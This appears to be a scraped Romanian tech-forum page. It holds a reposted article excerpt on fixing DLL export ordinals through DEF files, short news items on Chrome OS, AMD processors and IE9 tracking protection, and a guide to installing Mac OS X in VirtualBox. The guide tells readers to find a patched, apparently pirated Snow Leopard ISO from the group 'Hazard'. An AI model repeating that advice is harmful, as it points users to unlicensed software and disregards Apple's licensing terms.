that the client needs from the DLL. Figure 2 Client Links To Import Library But just how does a client find the stuff provided by the DLL? Names And Numbers When the Linker links a DLL, it assigns to the exported functions, classes or data, unique names and identifying numbers to all the exported items. For C++ functions and classes, the unique names are called Decorated Names. And the unique numbers assigned to the exported items are called Ordinals. Earlier, I mentioned a potential problem in which the Import Library used to link a client can become "inconsistent" with a newer version of the DLL associated with that Import Library. To explain what happens, we will take a look at two examples. I will not go into detail on how to create a DLL using Visual C++. If you do not know how to do this you should review the subject in the MSDN library or any book on Visual C++ programming. The first example we will look at exports in the conventional manner that most developers are familiar with. I have created a DLL project called ExportDemoDLL1. In that project I created a header file called MyFunctions.h. The contents are shown in Figure 3. Figure 3 ExportDemoDLL1 MyFunctions.h Notice that the DLL exports two functions using the "__declspec(dllexport)" directive and a class using the AFX_EXT_CLASS macro. Currently, the AFX_EXT_CLASS macro is simply defined to be AFX_CLASS_EXPORT by the Microsoft header file AFXV_DLL.h if a DLL is being built. The AFX_CLASS_EXPORT, currently, is itself defined to be __declspec(dllexport). If an executable is being built, Microsoft defines the AFX_EXT_CLASS macro as AFX_CLASS_IMPORT which, in turn is declared as "__declspec(dllimport)". You may occasionally see classes written by developers that make use of the AFX_CLASS_EXPORT or __declspec directly. However, you are encouraged to use the proper macro AFX_EXT_CLASS when creating a class to export in case Microsoft changes the way in which class exports must be made in a future version of Visual Studio/Visual C++. You will also notice the use of a preprocessor directive "_EXPORTING". This, together with the use of AFX_EXT_CLASS, makes it easy for you to create a single header file for use by the DLL project to export functions and data and for use by the client project to import the functions and data. This helps eliminate the need to maintain two separate header files. When you build your DLL, specify the preprocessor directive /D "_EXPORTING" in the list of compiler options. Do not do this when building the client and you will be able to use the same header file. When the ExportDemoDLL1.dll is built, the exports are translated into Decorated Names and Ordinal Numbers as shown highlighted in the "Export Function List View" windowpane of Dependency Walker: Figure 4 Export Function List View of Dependency Walker The "Export Function List View" windowpane has two columns of interest to us. The first is labeled "Ordinal". This is the unique Ordinal Number assigned to the exported function. The other column of interest is labeled "Function" and it shows the unique Decorated Name given to the exported function within the DLL. The client makes use of this information when locating the functions. The functions are defined as shown in Table 1. ***Vezi sursa*** Later, I will explain how to obtain the Decorated Names for items you wish to export and how to convert Decorated Names to Undecorated Names. You will notice in Figure 3 above that the class method CMyCLass::SAbout() is implemented within the class declaration. That is, the body is defined in the class declaration instead of within the CPP file for the class. When you fully define a class method within the class declaration, it is normally treated as an inline function. However, when you export an inline function with __declspec(dllexport), the inline function is always instantiated and exported, whether or not any module in the client program references the function. The function is presumed to be imported by another program. When you export an entire class using the AFX_EXT_CLASS macro as illustrated above you are, in effect, exporting the inline function SAbout(). This is why you see the method listed as an exported function in the "Export Function List View" of Dependency Walker in Figure 4 above. Now, assume that we have built a client application that makes use of this ExportDemoDLL1 DLL. Then we decide later to add a new function to the DLL and export it. We will try this and add a function called Sub() as shown in the new version of the header file in Figure 5. Figure 5 New Version of MyFunctions.h We now build the new version of the DLL and take a look at the exports in Dependency Walker: Figure 6 New Version of ExportDemoDLL in Dependency Walker Look at what happened to the exported function Sum(). Its Ordinal Number is now 8 where it was 7 in the previous version of ExportDemo1.DLL. If we do not re-link the client application with the Import Library created when building the new version of the ExportDemoDLL1.DLL the application will be looking for the function Sum() in the wrong location in the DLL!! The results are unpredictable and typically catastrophic. Further, you usually will have no clue as to why the executable crashed! You could spend a lot of time trying to debug this one. Now that we understand the problem, what can we do about it? The answer is to explicitly define Ordinals for the exported functions so that the exported functions will always receive the same ordinals on every release of the DLL. Defining Ordinals -- The DEF Way For the next part of the discussion, we will assume that a new DLL project has been created. I will refer to it as ExportDemoDLL2. When you use the Visual C++ AppWizard to create a new DLL project, the wizard creates a file called the Module Definition File. The file has a ".DEF" extension and contains information similar to that shown in the example in Figure 7. Figure 7 Default DEF File We will be making some additions to the contents of this file. But before we do we need to remove the export directives and macros from the header file MyFunctions.h that was created for our first example, ExportDemoDLL1. The header file for our new example DLL is shown in Figure 8. We haven’t added the function Sub() yet. We will do that shortly. Figure 8 New MyFunctions.h For ExportDemoDLL2 Now that we no longer state that we want the entire class CMyClass exported in the header (because we removed the AFX_EXT_CLASS macro) you must add export directives to the DEF file. The required entries for the DEF file for ExportDemoDLL2 are shown in Figure 9. Again, we will add our function Sub() shortly. Figure 9 New DEF File I have explicitly assigned ordinals to the exported functions. They are shown after the decorated names following the "@" sign. Text appearing to the right of a semi-colon is treated as a comment. The line containing the keyword LIBRARY specifies the internal name of the DLL. The line containing the keyword DESCRIPTION defines a string to be written into an .rdata section of the DLL. This description is different from the text inserted in the library by the Linker’s /COMMENT option. Now we are ready to build the new version of our DLL. But what happens now?! We get an unresolved external symbol error from the Linker! See Figure 10. igure 10 Unresolved External Symbol I mentioned above that because we were exporting an entire class with AFX_EXT_CLASS, the inline methods are always expanded and exported just like any other class method whose implementation is provided in a CPP file. But now we have removed the AFX_EXT_CLASS macro from the class declaration. The inline method CMyClass::SAbout() will now remain treated as an inline function. You cannot export an inline function because there is nothing to export. There are two solutions to this situation. Option 1 We may remove the definition for CMyClass::SAbout() from the header file and place it in the CPP file MyFunctions.cpp. The new header file will then appear as shown in Figure 11. Figure 11 MyFunctions.h Without Method Definition When we do this we can successfully build the DLL and examine it in Dependency Walker. You will notice that the method SAbout() is listed as an exported function in the "Export Function List View" windowpane just as it was before. Figure 12 ExampleDemoDLL2 With Non-Inlined Method Exported Option 2 Or, we may simply remove the export line for the member function SAbout from the DEF file. In this case MyFunctions.h will remain as shown in Figure 8. The DEF file would then appear as shown in Figure 13. And since the header file MyFunctions.h will be included in source code that references the DLL, the method CMyClass::SAbout() will continue to be treated as an inline function. But there is a "gotcha" with this implementation so I recommend that you use the first implementation. I will explain why later when I discuss the pitfalls of using DEF Files. Figure 13 DEF File Without Inlined Class Method But for now, notice that in the "Ordinal" column of the "Export Function List View" windowpane the exported functions are assigned the ordinals I defined in the DEF file. Ordinal numbers may be any number between 1 and 65,535 inclusive. Ordinal numbers 4 and 5 are skipped in the DEF file for the example ExportDemoDLL2 so Dependency Walker displays them with no export entry. As a matter of good practice, you should number your exports sequentially. Now, let us see what happens when we add the function Sub() to this new DLL project like we did in the example ExportDemoDLL1. I modified the header file to appear as shown in Figure 14. Note that I am going with the first option in the implementation of the method CMyClass::SAbout(). Figure 14 New MyFunctions.h With Function Sub() Then, I modified the DEF file as follows: Figure 15 New DEF File With Export Entry For Function Sub() After building the ExportDemoDLL2 again, we can re-examine the DLL using Dependency Walker. Figure 16 ExportDemoDLL2 In Dependency Walker With Function Sub() We now see the export for the function Sub() at the top of the "Export Function List View" windowpane of Dependency Walker with the assigned ordinal of 1. Notice that the ordinals for the other exported functions are unchanged from those shown in Figure 12 above. If I were to now place this new DLL (with the added function Sub()) from the example project ExportDemoDLL2 with an application linked with the Import Library produced by the version of ExportDemoDLL2 created before function Sub() was added, the executable would still run successfully. The newly added function Sub() would simply be ignored by the application. Exporting Global Variables Exporting global variables is just as easy as exporting functions. They will also be listed in the "Export Function List View" windowpane of Dependency Walker along with the functions and class methods that are exported. The only thing to remember is not to define the global in a header file that is included in both the DLL and your client or you will get an error from the Linker that the symbol is multiply | defined. As with the functions, you can export a global variable in two ways. The first method of exporting a global is to add a line to the header file as shown in MyFunctions.h in Figure 17. Then, in a CPP file of your DLL project, define the global variable as you would any global variable. ................................................................................. Sursa (articolul complet): How To Define And Use DLL Export Ordinals

Deci sa banez 85% dintre utilizatorii activi ai forumului?

Google se afiseaza cu noul Chrome OS si notebook-ul aferent de Silviu Anton | 8 decembrie 2010 Asa cum va anuntam si ieri, Google a lansat oficial varianta beta de testare a sistemului de operare Chrome, impreuna cu un nou notebook pe care sa ruleze. Google Chrome OS a fost conceput ca o platforma care sa imbine sistemul de operare de pe calculator cu Internetul: utilizatorul nu mai este nevoie sa ruleze programele direct de pe computer, ci le poate rula online, pe Web. Prin crearea programelor independente, Google se asigura ca toate aplicatiile si fisierele de orice tip vor avea intotdeauna back-up si vor fi disponibile oriunde si oricand, de vreme ce Chrome OS va fi si el disponibil indiferent de locul in care se afla userul. Asadar, posibilitatile sunt nelimitate, cu atat mai mult cu cat exista si Chrome Web Store, care ofera atat aplicatii platite, cat si gratuite. In ceea ce priveste echipamentul hardware pe care va rula initial Chome OS, marturisim ca cei de la Google au reusit sa ne surprinda intr-un mod placut. Notebook-ul Cr-48 are un ecran de 12 inci, tastatura full-size si un clickpad generos. Procesorul este Qualcomm Gobi 3G, iar bateria are o durata de viata de pana la 8 ore. Ceea ce a reusit sa ne straneasca mirarea a fost faptul ca Google a ales sa nu branduiasca notebook-ul cu nicio marca sau logo, impachetandu-l intr-un design total neatragator. Poate ca, cel putin de aceasta data, Google nu a tintit tocmai imaginea si look-ul, concentrandu-se in schimb pe lucruri mai importante de atat. Nu putem decat sa presupunem ca gigantul Internetul a vrut astfel sa ne transmita un mesaj, si anume, ca nu se vrea a fi un competitor pentru dezvoltatorii din zona hardware. O dovada in acest sens ar mai putea reprezenta si faptul ca Google a ales sa nu comercializeze acest laptop, ci sa il distrubuie gratuit printr-un program numit Chrome OS Pilot. Pentru a va inscrie in programul beta, puteti aplica aici. Cum insa numarul de unitati ale acestui laptop este limitat, cel mai probabil va trebui sa asteptati pana la jumatatea anului viitor, cand vor aparea modelele celor de la Samsung si Acer, care cu siguranta vor fi mult mai atragatoare de atat. Sursa: Google se afiseaza cu noul Chrome OS si notebook-ul aferent | Hit.ro

Cele mai puternice procesoare AMD Phenom cu sase si doua nuclee de Laurentiu Crisu | 8 decembrie 2010 AMD a lansat a doua noi modele de procesoare desktop Black Edition, unul dintre ele fiind varful de gama al seriei cu sase nuclee, AMD Phenom II X6. Aceste procesoare se alatura seriei de cipseturi AMD 8, dar si recent lansatei serii de placi grafice ATI Radeon HD 6000, ce ofera o experienta inedita 3D cu performante multimedia accelerate GPU. Procesorul AMD Phenom II X6 1100T este noul varf de gama pentru procesoarele desktop AMD ce ofera functionalitati de top cum ar fi multiplicatori de ceas deblocati, tehnologie Turbo CORE si performante pe sase nuclee. Procesorul AMD Phenom II X2 565 Black Edition este o alternativa accesibila pentru entuziastii in cautare de capabilitati de personalizare a performantelor la viteze incredibile. Cerintele tot mai mari de continut media HD si 3D au creat un nou standard pentru experienta vizuala. Versatilitatea computerelor cu tehnologie VISION creaza posibilitati nelimitate pentru utilizatori, cum ar fi orientarea catre Internet a divertismentului video, crearea de continut foto si video, rularea celor mai pretentioase jocuri PC si imbunatatirea performantelor multi-tasking. Utilizatorii in cautarea unui nou PC ce combina valoarea performantelor multi-core, optiuni multiple ale platformei PC, continut video HD si grafica 3D pot opta pentru un computer cu tehnologie VISION de la AMD. Sursa: Cele mai puternice procesoare AMD Phenom cu sase si doua nuclee | Hit.ro

Internet Explorer 9 introduce instrumentul anti-tracking pe Web de Cristina Enescu | 8 decembrie 2010 Browser-ul Microsoft IE9 va avea instrumente care vor restrictiona colectarea datelor despre activitatea online a utilizatorului, impiedicand astfel ca site-urile vizitate sa impartaseasca informatii despre activitatea acestuia pe Web. Vestea vine pe fondul criticilor adresate de guvernul Statelor Unite industriei de computere, legate de progresul lent in domeniul protejarii confidentialitatii utilizatorului. Intr-o postare pe blog, Microsoft a declarat ca oamenii nu isi dau seama ca atunci cand viziteaza un site, informatiile legate de ceea ce cauta sau cumpara ajung adesea in posesia altor companii, fara ca utilizatorii sa fie instiintati. Odata cu IE9, Microsoft planuieste sa introduca ceea ce numeste “Tracking Protection List”, care, potrivit companiei, se comporta asemeni listei “Do Not Call” ce limiteaza numarul persoanelor care pot fi sunate de firmele de marketing. Utilizatorii vor putea sa creeze liste prin care datele lor vor putea fi impartasite numai pe site-urile alese chiar de ei. Cand va fi pornit, sistemul ar putea impiedica vizualizarea anumitor reclame sau a altor functii in momentul in care utilizatorii viziteaza site-urile respective. Oricine va putea sa scrie o lista si sa o impartaseasca cu altii pentru a avea parte de aceeasi protectie, a declarat Microsoft. Compania planuieste, de asemenea, sa lanseze formatele si standardele pentru liste sub o licenta libera, pentru a putea fi adoptate si de alte browsere. Microsoft a mai adaugat ca primele versiuni ale acestor noi functii vor fi incluse in versiunea IE9, programata pentru lansare la inceputul lui 2011. Sursa: Internet Explorer 9 introduce instrumentul anti-tracking pe Web | Hit.ro

Am observat ca sunt unele probleme in legatura cu mail-ul de activare al unui cont nou creat. Daca v-ati creat un cont si nu ati primit mail-ul de activare, trimiteti-mi un MP si se rezolva. Nu va voi retrimite un email de activare ci va voi activa eu contul.

Nu trebuie sa le citesti pe toate, ar fi absurd, citeste fiecare ce anume il intereseaza.

How to Run Mac OS X in VirtualBox on Windows Author: Bobby Patton Sursa: How to Run Mac OS X in VirtualBox on Windows We've shown you how to install Snow Leopard in VMWare, but if you haven't purchased VMWare, you can now do it using previously mentioned, free program VirtualBox. Apart from VirtualBox, you'll also need an OSX86 ISO. The group Hazard has put out a good patched Snow Leopard installer that should do fine (just search for it on Google). Of course, if you feel bad about downloading the ISO of Snow Leopard, you could always go buy a copy to feel a bit better, karmically. After you have them both, install Virtualbox. Open up Virtualbox and click on New at the top left. At the Create New Virtual Machine window, click Next. At this window type OSX as the name and it will automatically change the system and version. The next window will let you choose your RAM amount: If you can spare it, crank it up as far as you can go, but 1024MB should be sufficient. This is where you'll make your hard disk. 20GB should be enough so what it comes down to is dynamic or static. Dynamic will expand on use and Static will be a fixed 20GB no matter how much data is actually in it. Dynamic is better for not taking up your hard drive but static should give you better performance. I normally use dynamic. Click next unless you want to change it from dynamic or if you want to increase the disk size or file location. It will show a summary of your settings. Click Finish, then click Settings at the top. At this window click on System in the left pane and uncheck Enable EFI. Now click on the Storage button on the left. From there click on Empty under the OSX.vdi, then click the folder with the green arrow on the right (next to "CD/DVD Device"). At this window click the Add button at the top. Then find and add the OSX86 ISO you downloaded earlier. Then highlight it and click Select at the bottom. Then click OK, and hit the Start button on the left side of the main VirtualBox window. As it starts up, click inside the window and hit F8. Then at the boot: prompt type –v so you can see what exactly went wrong if something does go wrong. All the services will run and eventually you should come to the language screen. Choose your language then click next. If you are unable to move your mouse around then hit Right-Ctrl + I. Click Continue and Agree. Next, start up Disk Utility by going to Utilities in the menu bar. At this screen highlight 20GB VBOX HARDDISK. Then click the Erase tab, name it what you want in the name box and click the Erase button on the bottom right of the window. It shouldn't take long. Then click Disk Utility in your menu bar and quit it. Now you're back at the installer. Highlight the drive that is now showing up and click Continue. The next window is important. Click the Customize button on the bottom left. AMD Users check: Any Updates included at the top. Drop down Kernels and choose Legacy kernel. AMD option below System support. Intel Users check: Any Updates included at the top. Drop down bootloaders and check the newest Chameleon. Drop down Kernels and choose Legacy kernel. Then click Done and hit the Install button. To speed up the process you can click Skip when the disc check pops up. As soon as it says "installation finished" and starts counting down to restart, press the right Ctrl key. Click on Devices at the top of the VirtualBox window, hit CD/DVD Devices and click Unmount CD/DVD Device. Then go to Machine > Reset and click Reset at the prompt. Next you'll see the Chameleon loader and then OS X will begin to boot. After it boots you will see the setup screens for OS X! You're good to go. The only hiccup I've found is that it can only be virtualized with one core. It could be the OSX disc I was using or it might not be. And I have yet to find the right kext that will allow audio to work and the resolution is limited also. But other than that you'll have a fully functioning OSX virtualized! Update: I'd like to post some answers to the resolution and audio. I should have looked around before posting this but I just didn't have the time. So anyways heres what you can do: To fix the resolution issue, open Finder and go to the OS X drive on the left. Open the folder called Extras. Right Click on the file com.Apple.Boot.plist and open it with TextEdit. Under the first insert this: Graphics Mode 1280x1024x32 or another compatible resolution. Select "Save As" at the top and save it to the desktop, unchecking the check under Unicode and then save it as com.apple.boot.plist. After that drag and drop it into the extras folder and overwrite the original file, entering your password when prompted. Instructions for the sound issue can be found here. Don't install system updates. If you want updates you'll have to install another iso distribution with the updates on it. If you install the updates directly from apple it messes with the custom kexts and chameleon. Just a forewarning. And for those of you getting boot issues try choosing a different version of Chameleon or a different kernel. Sometimes that seems to help. And If your getting one of the USB errors then try disabling USB in the VirtualBox settings and see if that helps. Tek411: OSX in Virtual Box (Hackintoshed VM)